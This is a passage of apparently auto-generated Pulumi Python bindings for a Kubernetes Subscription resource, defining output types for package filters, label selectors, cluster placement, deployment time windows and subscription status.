ObjectReference contains enough information to let you inspect or modify the referred object. --- New uses of this type are discouraged because of difficulty describing its usage when embedded in APIs. 1. Ignored fields. It includes many fields which are not generally honored. For instance, ResourceVersion and FieldPath are both very rarely valid in actual usage. 2. Invalid usage help. It is impossible to add specific help for individual usage. In most embedded usages, there are particular restrictions like, "must refer only to types A and B" or "UID not honored" or "name must be restricted". Those cannot be well described when embedded. 3. Inconsistent validation. Because the usages are different, the validation rules are different by usage, which makes it hard for users to predict what will happen. 4. The fields are both imprecise and overly precise. Kind is not a precise mapping to a URL. This can produce ambiguity during interpretation and require a REST mapping. In most cases, the dependency is on the group,resource tuple and the version of the actual struct is irrelevant. 5. We cannot easily change it. Because this type is embedded in many locations, updates to this type will affect numerous schemas. Don't make new APIs embed an underspecified API type they do not control. Instead of using this type, create a locally provided and used type that is well-focused on your reference. For example, ServiceReferences for admission registration: https://github.com/kubernetes/api/blob/release-1.17/admissionregistration/v1/types.go#L533 .
"""
return pulumi.get(self, "hooksecretref")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
To specify a single package in the channel
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def overrides(self) -> Optional[Sequence['outputs.SubscriptionSpecOverrides']]:
"""
For hub use only: specifies the overrides to apply when deploying to clusters
"""
return pulumi.get(self, "overrides")
@property
@pulumi.getter(name="packageFilter")
def package_filter(self) -> Optional['outputs.SubscriptionSpecPackageFilter']:
"""
To specify more than one package in the channel
"""
return pulumi.get(self, "package_filter")
@property
@pulumi.getter(name="packageOverrides")
def package_overrides(self) -> Optional[Sequence['outputs.SubscriptionSpecPackageOverrides']]:
"""
Provides flexibility to override a package in the channel with local input
"""
return pulumi.get(self, "package_overrides")
@property
@pulumi.getter
def placement(self) -> Optional['outputs.SubscriptionSpecPlacement']:
"""
For hub use only: specifies which clusters to deploy to
"""
return pulumi.get(self, "placement")
@property
@pulumi.getter
def timewindow(self) -> Optional['outputs.SubscriptionSpecTimewindow']:
"""
Helps the user control when the subscription will take effect
"""
return pulumi.get(self, "timewindow")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecHooksecretref(dict):
"""
ObjectReference contains enough information to let you inspect or modify the referred object.
---
New uses of this type are discouraged because of difficulty describing its usage when embedded in APIs:
1. Ignored fields. It includes many fields which are not generally honored. For instance, ResourceVersion and FieldPath are both very rarely valid in actual usage.
2. Invalid usage help. It is impossible to add specific help for individual usage. In most embedded usages, there are particular restrictions like, "must refer only to types A and B" or "UID not honored" or "name must be restricted". Those cannot be well described when embedded.
3. Inconsistent validation. Because the usages are different, the validation rules are different by usage, which makes it hard for users to predict what will happen.
4. The fields are both imprecise and overly precise. Kind is not a precise mapping to a URL. This can produce ambiguity during interpretation and require a REST mapping. In most cases, the dependency is on the group,resource tuple and the version of the actual struct is irrelevant.
5. We cannot easily change it. Because this type is embedded in many locations, updates to this type will affect numerous schemas.
Don't make new APIs embed an underspecified API type they do not control. Instead of using this type, create a locally provided and used type that is well-focused on your reference. For example, ServiceReferences for admission registration: https://github.com/kubernetes/api/blob/release-1.17/admissionregistration/v1/types.go#L533 .
"""
def __init__(__self__, *,
api_version: Optional[str] = None,
field_path: Optional[str] = None,
kind: Optional[str] = None,
name: Optional[str] = None,
namespace: Optional[str] = None,
resource_version: Optional[str] = None,
uid: Optional[str] = None):
"""
ObjectReference contains enough information to let you inspect or modify the referred object.
---
New uses of this type are discouraged because of difficulty describing its usage when embedded in APIs:
1. Ignored fields. It includes many fields which are not generally honored. For instance, ResourceVersion and FieldPath are both very rarely valid in actual usage.
2. Invalid usage help. It is impossible to add specific help for individual usage. In most embedded usages, there are particular restrictions like, "must refer only to types A and B" or "UID not honored" or "name must be restricted". Those cannot be well described when embedded.
3. Inconsistent validation. Because the usages are different, the validation rules are different by usage, which makes it hard for users to predict what will happen.
4. The fields are both imprecise and overly precise. Kind is not a precise mapping to a URL. This can produce ambiguity during interpretation and require a REST mapping. In most cases, the dependency is on the group,resource tuple and the version of the actual struct is irrelevant.
5. We cannot easily change it. Because this type is embedded in many locations, updates to this type will affect numerous schemas.
Don't make new APIs embed an underspecified API type they do not control. Instead of using this type, create a locally provided and used type that is well-focused on your reference. For example, ServiceReferences for admission registration: https://github.com/kubernetes/api/blob/release-1.17/admissionregistration/v1/types.go#L533 .
:param str api_version: API version of the referent.
:param str field_path: If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
:param str kind: Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
:param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
:param str namespace: Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
:param str resource_version: Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#concurrency-control-and-consistency
:param str uid: UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
if api_version is not None:
pulumi.set(__self__, "api_version", api_version)
if field_path is not None:
pulumi.set(__self__, "field_path", field_path)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if resource_version is not None:
pulumi.set(__self__, "resource_version", resource_version)
if uid is not None:
pulumi.set(__self__, "uid", uid)
@property
@pulumi.getter(name="apiVersion")
def api_version(self) -> Optional[str]:
"""
API version of the referent.
"""
return pulumi.get(self, "api_version")
@property
@pulumi.getter(name="fieldPath")
def field_path(self) -> Optional[str]:
"""
If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
"""
return pulumi.get(self, "field_path")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def namespace(self) -> Optional[str]:
"""
Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
"""
return pulumi.get(self, "namespace")
@property
@pulumi.getter(name="resourceVersion")
def resource_version(self) -> Optional[str]:
"""
Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#concurrency-control-and-consistency
"""
return pulumi.get(self, "resource_version")
@property
@pulumi.getter
def uid(self) -> Optional[str]:
"""
UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
return pulumi.get(self, "uid")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecOverrides(dict):
"""
Overrides field in deployable
"""
def __init__(__self__, *,
cluster_name: str,
cluster_overrides: Sequence[Mapping[str, Any]]):
"""
Overrides field in deployable
"""
pulumi.set(__self__, "cluster_name", cluster_name)
pulumi.set(__self__, "cluster_overrides", cluster_overrides)
@property
@pulumi.getter(name="clusterName")
def cluster_name(self) -> str:
return pulumi.get(self, "cluster_name")
@property
@pulumi.getter(name="clusterOverrides")
def cluster_overrides(self) -> Sequence[Mapping[str, Any]]:
return pulumi.get(self, "cluster_overrides")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecPackageFilter(dict):
"""
To specify more than one package in the channel
"""
def __init__(__self__, *,
annotations: Optional[Mapping[str, str]] = None,
filter_ref: Optional['outputs.SubscriptionSpecPackageFilterFilterRef'] = None,
label_selector: Optional['outputs.SubscriptionSpecPackageFilterLabelSelector'] = None,
version: Optional[str] = None):
"""
To specify more than one package in the channel
:param 'SubscriptionSpecPackageFilterFilterRefArgs' filter_ref: LocalObjectReference contains enough information to let you locate the referenced object inside the same namespace.
:param 'SubscriptionSpecPackageFilterLabelSelectorArgs' label_selector: A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
"""
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if filter_ref is not None:
pulumi.set(__self__, "filter_ref", filter_ref)
if label_selector is not None:
pulumi.set(__self__, "label_selector", label_selector)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter
def annotations(self) -> Optional[Mapping[str, str]]:
return pulumi.get(self, "annotations")
@property
@pulumi.getter(name="filterRef")
def filter_ref(self) -> Optional['outputs.SubscriptionSpecPackageFilterFilterRef']:
"""
LocalObjectReference contains enough information to let you locate the referenced object inside the same namespace.
"""
return pulumi.get(self, "filter_ref")
@property
@pulumi.getter(name="labelSelector")
def label_selector(self) -> Optional['outputs.SubscriptionSpecPackageFilterLabelSelector']:
"""
A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
"""
return pulumi.get(self, "label_selector")
@property
@pulumi.getter
def version(self) -> Optional[str]:
return pulumi.get(self, "version")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecPackageFilterFilterRef(dict):
"""
LocalObjectReference contains enough information to let you locate the referenced object inside the same namespace.
"""
def __init__(__self__, *,
name: Optional[str] = None):
"""
LocalObjectReference contains enough information to let you locate the referenced object inside the same namespace.
:param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?
"""
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names TODO: Add other useful fields. apiVersion, kind, uid?
"""
return pulumi.get(self, "name")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecPackageFilterLabelSelector(dict):
"""
A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
"""
def __init__(__self__, *,
match_expressions: Optional[Sequence['outputs.SubscriptionSpecPackageFilterLabelSelectorMatchExpressions']] = None,
match_labels: Optional[Mapping[str, str]] = None):
"""
A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
:param Sequence['SubscriptionSpecPackageFilterLabelSelectorMatchExpressionsArgs'] match_expressions: matchExpressions is a list of label selector requirements. The requirements are ANDed.
:param Mapping[str, str] match_labels: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
if match_expressions is not None:
pulumi.set(__self__, "match_expressions", match_expressions)
if match_labels is not None:
pulumi.set(__self__, "match_labels", match_labels)
@property
@pulumi.getter(name="matchExpressions")
def match_expressions(self) -> Optional[Sequence['outputs.SubscriptionSpecPackageFilterLabelSelectorMatchExpressions']]:
"""
matchExpressions is a list of label selector requirements. The requirements are ANDed.
"""
return pulumi.get(self, "match_expressions")
@property
@pulumi.getter(name="matchLabels")
def match_labels(self) -> Optional[Mapping[str, str]]:
"""
matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
return pulumi.get(self, "match_labels")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecPackageFilterLabelSelectorMatchExpressions(dict):
"""
A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
"""
def __init__(__self__, *,
key: str,
operator: str,
values: Optional[Sequence[str]] = None):
"""
A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
:param str key: key is the label key that the selector applies to.
:param str operator: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
:param Sequence[str] values: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "operator", operator)
if values is not None:
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def key(self) -> str:
"""
key is the label key that the selector applies to.
"""
return pulumi.get(self, "key")
@property
@pulumi.getter
def operator(self) -> str:
"""
operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
"""
return pulumi.get(self, "operator")
@property
@pulumi.getter
def values(self) -> Optional[Sequence[str]]:
"""
values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
return pulumi.get(self, "values")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
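# Illustrative example (not part of the generated schema): a package filter
# label selector combining matchLabels and matchExpressions. All requirements
# are ANDed, so a package must carry environment=production AND a tier label
# whose value is frontend or backend. All names and values are hypothetical.
#
#   labelSelector:
#     matchLabels:
#       environment: production
#     matchExpressions:
#       - key: tier
#         operator: In
#         values: ["frontend", "backend"]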
@pulumi.output_type
class SubscriptionSpecPackageOverrides(dict):
"""
Overrides field in deployable
"""
def __init__(__self__, *,
package_name: str,
package_alias: Optional[str] = None,
package_overrides: Optional[Sequence[Mapping[str, Any]]] = None):
"""
Overrides field in deployable
"""
pulumi.set(__self__, "package_name", package_name)
if package_alias is not None:
pulumi.set(__self__, "package_alias", package_alias)
if package_overrides is not None:
pulumi.set(__self__, "package_overrides", package_overrides)
@property
@pulumi.getter(name="packageName")
def package_name(self) -> str:
return pulumi.get(self, "package_name")
@property
@pulumi.getter(name="packageAlias")
def package_alias(self) -> Optional[str]:
return pulumi.get(self, "package_alias")
@property
@pulumi.getter(name="packageOverrides")
def package_overrides(self) -> Optional[Sequence[Mapping[str, Any]]]:
return pulumi.get(self, "package_overrides")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecPlacement(dict):
"""
For hub use only: specifies which clusters to deploy to
"""
def __init__(__self__, *,
cluster_selector: Optional['outputs.SubscriptionSpecPlacementClusterSelector'] = None,
clusters: Optional[Sequence['outputs.SubscriptionSpecPlacementClusters']] = None,
local: Optional[bool] = None,
placement_ref: Optional['outputs.SubscriptionSpecPlacementPlacementRef'] = None):
"""
For hub use only: specifies which clusters to deploy to
:param 'SubscriptionSpecPlacementClusterSelectorArgs' cluster_selector: A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
:param 'SubscriptionSpecPlacementPlacementRefArgs' placement_ref: ObjectReference contains enough information to let you inspect or modify the referred object.
"""
if cluster_selector is not None:
pulumi.set(__self__, "cluster_selector", cluster_selector)
if clusters is not None:
pulumi.set(__self__, "clusters", clusters)
if local is not None:
pulumi.set(__self__, "local", local)
if placement_ref is not None:
pulumi.set(__self__, "placement_ref", placement_ref)
@property
@pulumi.getter(name="clusterSelector")
def cluster_selector(self) -> Optional['outputs.SubscriptionSpecPlacementClusterSelector']:
"""
A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
"""
return pulumi.get(self, "cluster_selector")
@property
@pulumi.getter
def clusters(self) -> Optional[Sequence['outputs.SubscriptionSpecPlacementClusters']]:
return pulumi.get(self, "clusters")
@property
@pulumi.getter
def local(self) -> Optional[bool]:
return pulumi.get(self, "local")
@property
@pulumi.getter(name="placementRef")
def placement_ref(self) -> Optional['outputs.SubscriptionSpecPlacementPlacementRef']:
"""
ObjectReference contains enough information to let you inspect or modify the referred object.
"""
return pulumi.get(self, "placement_ref")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
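# Illustrative example (not part of the generated schema): a placement block
# that targets clusters via a placementRef, or by listing clusters directly.
# The kind and resource name shown here are hypothetical.
#
#   placement:
#     placementRef:
#       kind: PlacementRule
#       name: my-placement-rule
#     # alternatively, list target clusters explicitly:
#     # clusters:
#     #   - name: cluster1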
@pulumi.output_type
class SubscriptionSpecPlacementClusterSelector(dict):
"""
A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
"""
def __init__(__self__, *,
match_expressions: Optional[Sequence['outputs.SubscriptionSpecPlacementClusterSelectorMatchExpressions']] = None,
match_labels: Optional[Mapping[str, str]] = None):
"""
A label selector is a label query over a set of resources. The result of matchLabels and matchExpressions are ANDed. An empty label selector matches all objects. A null label selector matches no objects.
:param Sequence['SubscriptionSpecPlacementClusterSelectorMatchExpressionsArgs'] match_expressions: matchExpressions is a list of label selector requirements. The requirements are ANDed.
:param Mapping[str, str] match_labels: matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
if match_expressions is not None:
pulumi.set(__self__, "match_expressions", match_expressions)
if match_labels is not None:
pulumi.set(__self__, "match_labels", match_labels)
@property
@pulumi.getter(name="matchExpressions")
def match_expressions(self) -> Optional[Sequence['outputs.SubscriptionSpecPlacementClusterSelectorMatchExpressions']]:
"""
matchExpressions is a list of label selector requirements. The requirements are ANDed.
"""
return pulumi.get(self, "match_expressions")
@property
@pulumi.getter(name="matchLabels")
def match_labels(self) -> Optional[Mapping[str, str]]:
"""
matchLabels is a map of {key,value} pairs. A single {key,value} in the matchLabels map is equivalent to an element of matchExpressions, whose key field is "key", the operator is "In", and the values array contains only "value". The requirements are ANDed.
"""
return pulumi.get(self, "match_labels")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecPlacementClusterSelectorMatchExpressions(dict):
"""
A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
"""
def __init__(__self__, *,
key: str,
operator: str,
values: Optional[Sequence[str]] = None):
"""
A label selector requirement is a selector that contains values, a key, and an operator that relates the key and values.
:param str key: key is the label key that the selector applies to.
:param str operator: operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
:param Sequence[str] values: values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "operator", operator)
if values is not None:
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def key(self) -> str:
"""
key is the label key that the selector applies to.
"""
return pulumi.get(self, "key")
@property
@pulumi.getter
def operator(self) -> str:
"""
operator represents a key's relationship to a set of values. Valid operators are In, NotIn, Exists and DoesNotExist.
"""
return pulumi.get(self, "operator")
@property
@pulumi.getter
def values(self) -> Optional[Sequence[str]]:
"""
values is an array of string values. If the operator is In or NotIn, the values array must be non-empty. If the operator is Exists or DoesNotExist, the values array must be empty. This array is replaced during a strategic merge patch.
"""
return pulumi.get(self, "values")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecPlacementClusters(dict):
"""
GenericClusterReference - in alignment with kubefed
"""
def __init__(__self__, *,
name: str):
"""
GenericClusterReference - in alignment with kubefed
"""
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecPlacementPlacementRef(dict):
"""
ObjectReference contains enough information to let you inspect or modify the referred object.
"""
def __init__(__self__, *,
api_version: Optional[str] = None,
field_path: Optional[str] = None,
kind: Optional[str] = None,
name: Optional[str] = None,
namespace: Optional[str] = None,
resource_version: Optional[str] = None,
uid: Optional[str] = None):
"""
ObjectReference contains enough information to let you inspect or modify the referred object.
:param str api_version: API version of the referent.
:param str field_path: If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
:param str kind: Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:param str name: Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
:param str namespace: Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
:param str resource_version: Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
:param str uid: UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
if api_version is not None:
pulumi.set(__self__, "api_version", api_version)
if field_path is not None:
pulumi.set(__self__, "field_path", field_path)
if kind is not None:
pulumi.set(__self__, "kind", kind)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace is not None:
pulumi.set(__self__, "namespace", namespace)
if resource_version is not None:
pulumi.set(__self__, "resource_version", resource_version)
if uid is not None:
pulumi.set(__self__, "uid", uid)
@property
@pulumi.getter(name="apiVersion")
def api_version(self) -> Optional[str]:
"""
API version of the referent.
"""
return pulumi.get(self, "api_version")
@property
@pulumi.getter(name="fieldPath")
def field_path(self) -> Optional[str]:
"""
If referring to a piece of an object instead of an entire object, this string should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2]. For example, if the object reference is to a container within a pod, this would take on a value like: "spec.containers{name}" (where "name" refers to the name of the container that triggered the event) or if no container name is specified "spec.containers[2]" (container with index 2 in this pod). This syntax is chosen only to have some well-defined way of referencing a part of an object. TODO: this design is not final and this field is subject to change in the future.
"""
return pulumi.get(self, "field_path")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of the referent. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> Optional[str]:
"""
Name of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#names
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def namespace(self) -> Optional[str]:
"""
Namespace of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/
"""
return pulumi.get(self, "namespace")
@property
@pulumi.getter(name="resourceVersion")
def resource_version(self) -> Optional[str]:
"""
Specific resourceVersion to which this reference is made, if any. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#concurrency-control-and-consistency
"""
return pulumi.get(self, "resource_version")
@property
@pulumi.getter
def uid(self) -> Optional[str]:
"""
UID of the referent. More info: https://kubernetes.io/docs/concepts/overview/working-with-objects/names/#uids
"""
return pulumi.get(self, "uid")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecTimewindow(dict):
"""
Helps the user control when the subscription will take effect
"""
def __init__(__self__, *,
daysofweek: Optional[Sequence[str]] = None,
hours: Optional[Sequence['outputs.SubscriptionSpecTimewindowHours']] = None,
location: Optional[str] = None,
windowtype: Optional[str] = None):
"""
Helps the user control when the subscription will take effect
:param Sequence[str] daysofweek: daysofweek defines the days of the week for this time window. See https://golang.org/pkg/time/#Weekday
:param str location: https://en.wikipedia.org/wiki/List_of_tz_database_time_zones
:param str windowtype: Indicates whether the time window is active or blocked. If the time window is active, deployments are applied only during these windows. Note: to generate the CRD with operator-sdk v0.10.0, the following line should be: <+kubebuilder:validation:Enum=active,blocked,Active,Blocked>
"""
if daysofweek is not None:
pulumi.set(__self__, "daysofweek", daysofweek)
if hours is not None:
pulumi.set(__self__, "hours", hours)
if location is not None:
pulumi.set(__self__, "location", location)
if windowtype is not None:
pulumi.set(__self__, "windowtype", windowtype)
@property
@pulumi.getter
def daysofweek(self) -> Optional[Sequence[str]]:
"""
daysofweek defines the days of the week for this time window. See https://golang.org/pkg/time/#Weekday
"""
return pulumi.get(self, "daysofweek")
@property
@pulumi.getter
def hours(self) -> Optional[Sequence['outputs.SubscriptionSpecTimewindowHours']]:
return pulumi.get(self, "hours")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
https://en.wikipedia.org/wiki/List_of_tz_database_time_zones
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def windowtype(self) -> Optional[str]:
"""
Indicates whether the time window is active or blocked. If the time window is active, deployments are applied only during these windows. Note: to generate the CRD with operator-sdk v0.10.0, the following line should be: <+kubebuilder:validation:Enum=active,blocked,Active,Blocked>
"""
return pulumi.get(self, "windowtype")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionSpecTimewindowHours(dict):
"""
HourRange defines a time range; each time uses the Kitchen format defined at https://golang.org/pkg/time/#pkg-constants
"""
def __init__(__self__, *,
end: Optional[str] = None,
start: Optional[str] = None):
"""
HourRange defines a time range; each time uses the Kitchen format defined at https://golang.org/pkg/time/#pkg-constants
"""
if end is not None:
pulumi.set(__self__, "end", end)
if start is not None:
pulumi.set(__self__, "start", start)
@property
@pulumi.getter
def end(self) -> Optional[str]:
return pulumi.get(self, "end")
@property
@pulumi.getter
def start(self) -> Optional[str]:
return pulumi.get(self, "start")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionStatus(dict):
"""
    SubscriptionStatus defines the observed state of Subscription.

    Example - status of a subscription on the hub:

        Status:
          phase: Propagated
          statuses:
            washdc:
              packages:
                nginx:
                  phase: Subscribed
                mongodb:
                  phase: Failed
                  Reason: "not authorized"
                  Message: "user xxx does not have permission to start pod"
                  resourceStatus: {}
            toronto:
              packages:
                nginx:
                  phase: Subscribed
                mongodb:
                  phase: Subscribed

    The status of a subscription on a managed cluster will only have one cluster in the map.
"""
def __init__(__self__, *,
ansiblejobs: Optional['outputs.SubscriptionStatusAnsiblejobs'] = None,
last_update_time: Optional[str] = None,
message: Optional[str] = None,
phase: Optional[str] = None,
reason: Optional[str] = None,
statuses: Optional[Mapping[str, 'outputs.SubscriptionStatusStatuses']] = None):
"""
        SubscriptionStatus defines the observed state of Subscription.

        Example - status of a subscription on the hub:

            Status:
              phase: Propagated
              statuses:
                washdc:
                  packages:
                    nginx:
                      phase: Subscribed
                    mongodb:
                      phase: Failed
                      Reason: "not authorized"
                      Message: "user xxx does not have permission to start pod"
                      resourceStatus: {}
                toronto:
                  packages:
                    nginx:
                      phase: Subscribed
                    mongodb:
                      phase: Subscribed

        The status of a subscription on a managed cluster will only have one cluster in the map.
        :param str phase: INSERT ADDITIONAL STATUS FIELD - define observed state of cluster. Important: Run "make" to regenerate code after modifying this file
        :param Mapping[str, 'SubscriptionStatusStatusesArgs'] statuses: for an endpoint, this is the status of the subscription and the key is the package name; for the hub, it aggregates all statuses and the key is the cluster name
"""
if ansiblejobs is not None:
pulumi.set(__self__, "ansiblejobs", ansiblejobs)
if last_update_time is not None:
pulumi.set(__self__, "last_update_time", last_update_time)
if message is not None:
pulumi.set(__self__, "message", message)
if phase is not None:
pulumi.set(__self__, "phase", phase)
if reason is not None:
pulumi.set(__self__, "reason", reason)
if statuses is not None:
pulumi.set(__self__, "statuses", statuses)
@property
@pulumi.getter
def ansiblejobs(self) -> Optional['outputs.SubscriptionStatusAnsiblejobs']:
return pulumi.get(self, "ansiblejobs")
@property
@pulumi.getter(name="lastUpdateTime")
def last_update_time(self) -> Optional[str]:
return pulumi.get(self, "last_update_time")
@property
@pulumi.getter
def message(self) -> Optional[str]:
return pulumi.get(self, "message")
@property
@pulumi.getter
def phase(self) -> Optional[str]:
"""
        INSERT ADDITIONAL STATUS FIELD - define observed state of cluster. Important: Run "make" to regenerate code after modifying this file
"""
return pulumi.get(self, "phase")
@property
@pulumi.getter
def reason(self) -> Optional[str]:
return pulumi.get(self, "reason")
@property
@pulumi.getter
def statuses(self) -> Optional[Mapping[str, 'outputs.SubscriptionStatusStatuses']]:
"""
        For an endpoint, this is the status of the subscription and the key is the package name; for the hub, it aggregates all statuses and the key is the cluster name
"""
return pulumi.get(self, "statuses")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionStatusAnsiblejobs(dict):
def __init__(__self__, *,
lastposthookjob: Optional[str] = None,
lastprehookjob: Optional[str] = None,
posthookjobshistory: Optional[Sequence[str]] = None,
prehookjobshistory: Optional[Sequence[str]] = None):
if lastposthookjob is not None:
pulumi.set(__self__, "lastposthookjob", lastposthookjob)
